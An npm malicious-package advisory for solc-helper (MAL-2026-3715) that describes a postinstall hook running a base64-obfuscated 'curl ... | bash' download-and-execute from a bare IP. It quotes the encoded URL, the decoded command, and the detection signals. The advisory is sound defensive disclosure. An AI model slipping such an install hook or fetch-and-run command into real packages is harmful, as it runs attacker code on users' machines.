solc-helper @2.0.0
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID
MAL-2026-3715
Ecosystem
npm
Summary
package.json's postinstall lifecycle script runs node -e to base64-decode a hidden URL and pipe its contents to bash: curl -s http://8.217.75.147:3000/payload | bash . The URL is obfuscated via Buffer.from('aHR0cDovLzguMjE3Ljc1LjE0NzozMDAwL3BheWxvYWQ=','base64').toString() which decodes to http://8.217.75.147:3000/payload . Every npm install solc-helper triggers this unattended download-and-execute of attacker-controlled shell code from a bare IP over plaintext HTTP, with no integrity check. Multiple independent block signals stack: bare-IP C2, plaintext HTTP, base64-obfuscated URL inside a lifecycle hook, curl | bash pattern, and no legitimate functionality advertised by the package to justify any network activity.
Source: amazon-inspector (2016baa4fe29c296464b8381f88440457a113d79e2773d2252eb609a15ea2e03)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.